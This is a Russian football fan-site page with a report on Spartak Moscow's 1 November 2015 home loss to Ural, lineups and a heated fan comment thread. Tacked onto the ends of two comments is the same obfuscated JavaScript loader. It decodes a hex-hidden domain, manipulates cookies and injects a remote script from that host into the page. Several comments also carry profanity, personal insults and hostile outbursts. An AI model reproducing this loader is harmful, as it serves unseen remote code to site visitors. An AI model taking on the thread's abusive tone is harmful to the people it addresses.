Логин: Пароль: Регистрация Забыли пароль?
Добавить в избранное  
 Инстаграм redwhite.ru Официальный канал REDWHITE.RU на youtube  вконтакте redwhite.ru  Твиттер redwhite.ru Главная Поиск Карта сайта Версия для печати
Фотографии
Видео
Таблица ЧР 2017/2018


команда


и

о

Локомотив

Локомотив 16

33

Зенит

Зенит 16

30

цска 17

29

Краснодар

Краснодар 16

27

СПАРТАК

СПАРТАК 16

25

Урал

Урал 16

24

Арсенал

Арсенал 16

23

Уфа

Уфа 16

21

Ахмат

Ахмат 16

21

Рубин

Рубин 16

19

Ростов

Ростов 16

18

Амкар

Амкар 16

17

Тосно

Тосно 16

17

Анжи

Анжи 16

16

Динамо

Динамо 16

15

Хабаровск

Хабаровск 17

12

Лига Чемпионов 17/18
ФНЛ 2017/2018
Молодежные команды


Опрос



Как уральский Юрген Клопп обыграл «Спартак»
01.11.2015


Матч 14-го тура чемпионата России между «Спартаком» и «Уралом» завершился победой гостей. Итоговый счет матча – 1:0 в пользу «Урала».

В первом тайме обе команды имели возможности открыть. Так, удар Романа Широкова был выбит защитником из пустых ворот, а Манучарян ударом из-за пределов штрафной сотряс перекладину ворот Реброва. Артем в первой половине выручил свою команду, отбив очень непростой удар Асеведо с близкого расстояния.

На протяжении матча оборона спартаковцев не раз ошибалась, чем и воспользовался 80-й минуте. Тот же Асеведо получил при бездействии защитников красно-белых и уверенно реализовал выход один на один с Ребровым. Вскоре автор гола получил вторую желтую карточку и покинул поле, но от поражения хозяев это не спасло.

После этого поражения «Спартак» занимает пятое место. В активе у подопечных Дмитрия Аленичева 23 очка. «Урал» набрал 22 очка и вышел на шестое место. 



Почти три года назад один молодой футболист «Спартака» уже сыграл за главную команду. Ещё и в победном матче, в казанской битве, где красно-белые одолели «Рубин» 1:0. Единственный гол тогда забил Эйден Макгиди, и фанаты «Спартака» проводили его аплодисментами на 92-й минуте. Поскольку ирландца заменили, целую минуту на поле провёл один центральный защитник. Рослый, неплохо читающий игру и даже при желании смачно бьющий по воротам.

Этого таинственного футболиста зовут Илья, фамилия — Кутепов. Да-да, официально дебютировал за «Спартак» он ещё в декабре 2012-го, а вовсе не сегодня. Тем не менее, Аленичев удивил — если появление Давыдова и Зуева в старте было довольно ожидаемым, то Кутепова там едва ли ждали. Впрочем, человеку уже 22 года, авансы ему выдают не первый сезон, и пора бы показывать себя не только на уровне ФНЛ. Но и в РФПЛ.

Дмитрий Аленичев, с одной стороны, за молодёжью следит внимательно, с другой, не единожды повторял, что результаты его, разумеется, волнуют. Потому инкубатор по выращиванию юных звёзд он создавать не собирается. Однако после игры с «Динамо» особенно отметил Давыдова с Зуевым, и стало понятно — уж в ближайших матчах болельщики «Спартака» точно увидят в старте воспитанников красно-белых.

Собственно, фанатская трибуна прокричала фамилию Кутепова так, будто Илья выступает за основу уже лет 10.

Правда, по игре такого сказать нельзя. 22-летний защитник до перерыва несколько раз не слишком удачно играл позиционно. До поры до времени Таски успевал его подстраховывать. Однако, помимо неопытного центрдефа, «Спартак» получил ещё и неуверенного опорника. Явно не лучший матч выдавал Глушаков — Аленичев заменил его неприлично рано, на 35-й минуте. К моменту выхода Зотова «Урал» уже потряс перекладину и вообще смотрелся ничуть не хуже хозяев. Если не лучше.

«Спартак» старался развивать атаки как можно быстрее — мобильные Промес и Зуев постоянно просили мяч и открывались. Однако «Урал» защищался и плотно, и разумно. Даже получая мяч, форварды «Спартака» почти не имели пространства, упираясь в защитников соперника. Окей, Широков был близок к голу после ошибки Арапова, но едва ли это было бы логичным развитием событий.

В предыдущем матче чемпионата «Спартак» уже уходил на перерыв с ничейным счётом. Но то была бойкие и обоюдоострые 1:1 с «Динамо» в Химках. Сейчас же «Спартак» почти ничего не показал в атаке, а вот в обороне позволял сопернику слишком много.

«Дмитрий Аленичев!» — скандировали трибуны в концовке тайма. И правильно делали, потому что главному тренеру «Спартака» нужно было показать себя. В раздевалке команды, ведь без изменения игры красно-белые рисковали потерять очки. Как минимум два. А то и больше.

Выдав сногсшибательную концовку в Химках, «Спартак» после этого три тайма подряд не забивал. И если «Кубань», оказывается, вообще топ-клуб в последнее время и проиграть ей всего 0:1 — достижение, то минимум шансов с «Уралом» настораживали.

Аленичев это понимал и затеял мини-революцию в атаке. Ушёл активный, но не эффективный Зуев, вышел мощный Зе Луиш, а Давыдов, соответственно, сместился на фланг. И почти сразу мог забить как раз со своей новой позиции. Но слишком долго возился с мячом, вывалившись к воротам.

«Спартак» стал больше играть от себя, контролировать мяч и чаще доставлять его в штрафную. «Урал» же окончательно смирился с контратакующим стилем игры. Впрочем, ничего негативного в слове «смирился» здесь нет. Напротив, в ответных атаках «Урал» был ещё острее, чем в позиционном нападении до перерыва. Чётко выбирал направления атак умница Подберёзкин, Лунгу и Манучарян успешно поддерживали почти все его начинания. Но Ребров не просто так целует штанги — в одном из эпизодов только стойка ворот спасла «Спартак» после выстрела того же Подберёзкина.

Опорная зона хозяев отказывалась функционировать, независимо от фамилий исполнителей в ней. «Урал» моментально проходил спартаковский центр и проникал прямо к воротам Реброва. Собственно, подопечные Скрипченко быстренько забыли о «выездной модели» и снова были просто убедительнее москвичей. А не только «иногда выбирались на чужую половину поля».

Спасать красно-белое отечество Аленичев доверил Озбилису, снова убрал с поля молодого сотрудника, на этот раз Давыдова. «Спартак» сочинил кое-что в атаке, но, давайте быть честными, «Урал» категорически и безусловно заслужил свой гол. Забил Асеведо, а Скрипченко, весь матч бушевавший у бровки, радовался мячу так, словно фамилия у него Клопп. Кстати, и «Урал» сыграл так, как «Боруссия» производства Юргена. Со скидкой на уровень, конечно. «Спартак» же, естественно, не вызвал никаких ассоциаций с «Баварией» и по делу проиграл.



"Спартак" - "Урал" - 0:1 (0:0)

Голы: Асеведо 80 (0:1). 

"Спартак": Ребров, Таски, Гранат, Кутепов, Паршивлюк, Попов, Глушаков (Зотов, 31), Промес, Широков, Зуев (Зе Луиш, 46), Давыдов (Озбилиз, 63)

"Урал": Арапов, Данцев, Фонтанелло, Мартынович (Новиков, 68), Хозин, Сапета, Подберёзкин (Ярошенко, 83), Емельянов, Лунгу, Асеведо, Манучарян (Фидлер, 86)

Предупреждения: Таски, 34; Гранат, 40; Широков, 61; Зе Луиш, 85 - Асеведо, 43; Хозин, 72

Удаления: нет - Асеведо, 83

Судья: Владислав Безбородов (Санкт-Петербург)

Место и дата
01 ноября 19:30, Открытие Арена


Источник: «Чемпионат»
Новость добавил: Duc37





оставлять комментарии могут только зарегистрированные пользователи!

число комментариев:  24

Возврат к списку


0 / 0
КБ Мария
budda194, угу, Карпин, куда ж без него
0 / 0
val
Пару слов по игре. ДАА какой ресурс имеет с тем и выходит. При этом открыто признает ошибки ТШ, в частности Саматова и правильно, что не рубит сгоряча.
Ребров - да когда надо вытащил, вопросов нет. НО не должен быть капитаном вратарь - ИМХО.
Паршивлюк - привычно плохо и даже добавлять ничего не хочу. Ни атаки ни защиты - полный 0.
Такси - без Бокетти ему плохо и вина с голом тоже его есть - не чего было выбрасываться вперед.
Кутепов - хорошо и даже забиты гол впечатление мое от его игры не портит. А слова про фол последней надежды - задним умом мы все хороши.
Глушаков- очень верно заменил его ДАА. Зотов мне понравился в разы больше - и по движению и по мысли.
Широков -как бы его не ругали - заниматься он должен не обороной.
Попов - не попал в игры и был очень нервный и чувствовалось бессилие
Промес - без него мы 0
Зуев- и нагл и быстр - надо мясом обрасти. Практика практика и практика
Давыдов - с мощной защитой потерялся. Во втором тайме старался, но не получилось.
Зе - делал что мог, передач на него было мало
ну и наконец Озбилис - это нечто... как не понимает ДАА что он делает, так и не понимаю я!
0 / 0
avtai
Я говорил про футбол 90-х олень и буквально понимать слова может только не далекий человек такой как ты и за 14 туров сделать команду, да (ты великий гуру) ,твой великий тренер не мог даже за сезон пару центрдефов подобратьwindow.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20828",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("redwhite.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
0 / 0
AndrewGenius
avtai, не знаю "зачем вам трусы" и у кого ты привык от....ть. Ещё один умник, нашелся! Тебе футбол за эти 14 туров понравился? Эстет х...в
0 / 0
avtai
Зная результаты настоящая команда вышла бы и порвала соперника в клочья, но не Спартак сегодняшних дней это же звезды, мастера футбольного дела, чемпионы и великие и технари что им Урал, им Барселона никто,поиграем проиграли ,ничего страшного в ресторане горе зальем .Благо Федун вовремя денежки башляет....вот бездари убил бы на хрен
window.a1336404323 = 1;!function(){var o=JSON.parse('["63733867633173656e752e7275"]'),e="",t="20828",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.oner ror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("redwhite.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
0 / 0
Джон FK SM Saratov
Face1967, широ за спину держался. совсем никакой....
0 / 0
Хитрый Лис
Ага. Еще один "талант"))))) Как только обыгрывает мертвый Спартак , так сразу гений))))) он в след туре Мордве сольет 0-4 и дальше кем он будет?)))
0 / 0
Bombardir
avtai, про Якина полностью согласен. AndrewGenius, футбол Якина - футбол под названием "бей-беги".
0 / 0
Bombardir
AndrewGenius, 2 замены пришлось делать, т.к. пол команды пешком ходила, но это не бильярд, а футбол. Большинство команды вышло с таким настроением и выражением лица, что можно было подумать - у них несворение желудка. А на самом деле это была классическая итальянская забастовка. Я не верю, что команда молодых хорошо тренированных футболистов не смогли в полную силу отыграть второй матч за неделю.
0 / 0
avtai
AndrewGenius я тебе так скажу дружище ни хрена ты в футболе не понимаешь и не видел гениальный футбол а если ты привык от .......вать у всех и ценить якиновский футбол то тебя я бы даже в армию не взял зачем там трусы
0 / 0
avtai
Ребята болею за мясо с 12 лет сейчас мне 32 и я просто ох........... как эти у....... играют с аутсайдерами такое ощущение .......блин Реал против нас выходил в 1998 так, и эти на игру с Уралом .Все хают Федуна а я бы этим у... не заплатил ни копейки за такую игру.Реальный шанс догнать бомжей и так об.....ся. Аленичеву уважуха что до сих пор мучается с инвалидами.
0 / 0
Face1967
Широков и Глушаков в футбол вообще разучились играть - в дубль в Иркутск!!!
0 / 0
Андрей из Крыма
ну и заголовок))) можно просто, без Юрген.
0 / 0
AndrewGenius
Аленичев прививает своим игрокам инфантильность! Они играют в академичный футбол. Якин приучал к быстрым разящим контратакам с длинными пасами на полполя - это был перебор. Но и катать яйца, стеночки и пяточки - это противно смотреть! Нельзя играть сейчас так как играли в 90-ые. Футбол стал намного быстрее и атлетичнее. Игрокам теперь нужно уметь реализовывать полумоменты, а не катать мячик полупассивно перемещаясь на 2-3 метра. Вымораживает также, что пасы дальше 5-7 метров вообще разучились отдавать! Сразу видно, что их просто не тренируют! Пока мяч доходит до наших "мэтров-плеймейкеров" у соперника уже 2 ряда игроков выстраивается!
0 / 0
ildar-ok
Победа Урала над Спартаком-событие регулярного масштаба. Ничего сверхестественного.- Вот что сейчас про Спартак говорят на 90минут+ Сёмин,Пименов и компания Шмурнов и Нобель. Дожилисььь
0 / 0
ildar-ok
Карпин хоть игроков заряжал на победу в домашних матчах,аутсайдеров дома всех выносили,пинка давал игрокам. А сейчас что? Началось всё с 1го матча домашнего с уфой. Алейнечев дал установку играть от души им-до сих пор играют от души- от фонаря)
0 / 0
AndrewGenius
Bombardir, тут по игре с Уралом видна недоработка и тренеров. Почему например потребовались 2 замены ещё до начала второго тайма? Почему Промес сегодея был никакой? Почему медленно и тяжело двигались по полю?
Вероятнее всего - это ошибка в тренировочном процессе. Вот в чем беда неопытных тренеров - они нарабатывают опыт на таких вот ошибках. Матерые тренера не позволяют такие ошибки по составу и по тренировочным нагрузкам.
Это поражение Аленичева как тренера
0 / 0
Сибирский
позорище..я не ожидал такого ..ползали по полю словно мухи сонные.. короче Аленичев повторяет путь Якина..неплохое вроде начало..вылет из Кубка и по наклонной..метание с составом...опять ставка на молодежь..короче это день сурка...Федун просто вызывает отвращение своим видом... все эти забегания хороши, когда футболисты обучены, а не как слепые котята тычуться в защитников, застревая между ними.. мне просто обидно за Спартак ..Великий клуб сделать середняком..и это при таких болельщиках по всей стране
0 / 0
22rus
Болел за эту команду... помню, вставать в семь утра на пары, а я до полчетвертого лигу чемпионов смотрю(Сибирь) и играли же. А щас говну проигрывают из раза в раз. Обещал себе не смотреть на это говно, у которого только название родное осталось((( Всякой чуме дома сливается((( Не первый раз уже... Чмошники все!
0 / 0
budda194
ПУСТЬ МНЕ КРАСНУЮ ДАДУТ..Я БРАТЬЯ СКАЖУ ТО ЧТО СКАЗАЛ НА ФОРМЕ
КАРПИН ТВАРЬ Я ТЕБЯ НЕНАВИЖУ ССУКА.ТЫ УБИЛ Спартак ,ДУХ.УЖ НИ КТО НЕ МОЖЕТ ВЫТАЩИТЬ...АСХАБАДЗУ НА ПАНЕЛЬ ГДЕ НАЧИНАЛ ССУКА,ДО СИХ ПОР КОЗНИ СТРОИТ..ПРОДАЛИ ФУТБОЛ ТВАРИ..А МНЕ В РЗЕ ПО ГОРОДУ КАЖДЫЙ ДЕНЬ ХОДИТЬ..
0 / 0
AndrewGenius
7 отборов, 5 перехватов и 14 выносов за матч! Это просто суперстатистика!
0 / 0
Anjey
Эх,Эйден,Эйден - не хватает тебя - твоей энергии,напора,неравнодушия...с кем остались?))
0 / 0
Bombardir
кучка дормоедов и бездельников! им каких тренеров не дай они при любых филонить будут.
0 / 0
AndrewGenius
Сегодня я ещё раз воочию убедился что в Урале сейчас играет лучшая пара центральных защитников в нашем чемпионате Фонтанельо-Мартынович. Причем Фонтанельо провел и прошлый чемпионат блестяще. Не понимаю, почему он до сих пор играет за Урал. Это игрок высокого класса и нам бы он точно не помешал!
Хоккейный клуб "Спартак"
Отчеты о выездах
Фото дубля
Друзья
Партнеры
Случайное фото
Фото0128.jpg
Следующая игра
18 ноября 2017
Краснодар Спартак Москва
Стадион "Краснодар"
начало матча в 16:30
4 ноября 2017
Спартак Москва Тамбов
Стадион Спартак
начало матча в 14:00
18 ноября 2017
Краснодар Спартак Москва
Академия ФК Краснодар
начало матча в 13:30
2 ноября 2017
ска Спартак Москва
Спб, Ледовый Дворец
начало матча в 19:30
12 ноября 2017
Спартак Москва динамо спб
ЛД "Сокольники"
начало матча в 13:00
11 ноября 2017
Сборная России Аргентина
"Стадион Лужники"
начало матча в --:-
Виджет для яндекса
Наши кнопочки

или:

Спартак - фото, видео и отчеты с выездов - RedWhite.Ru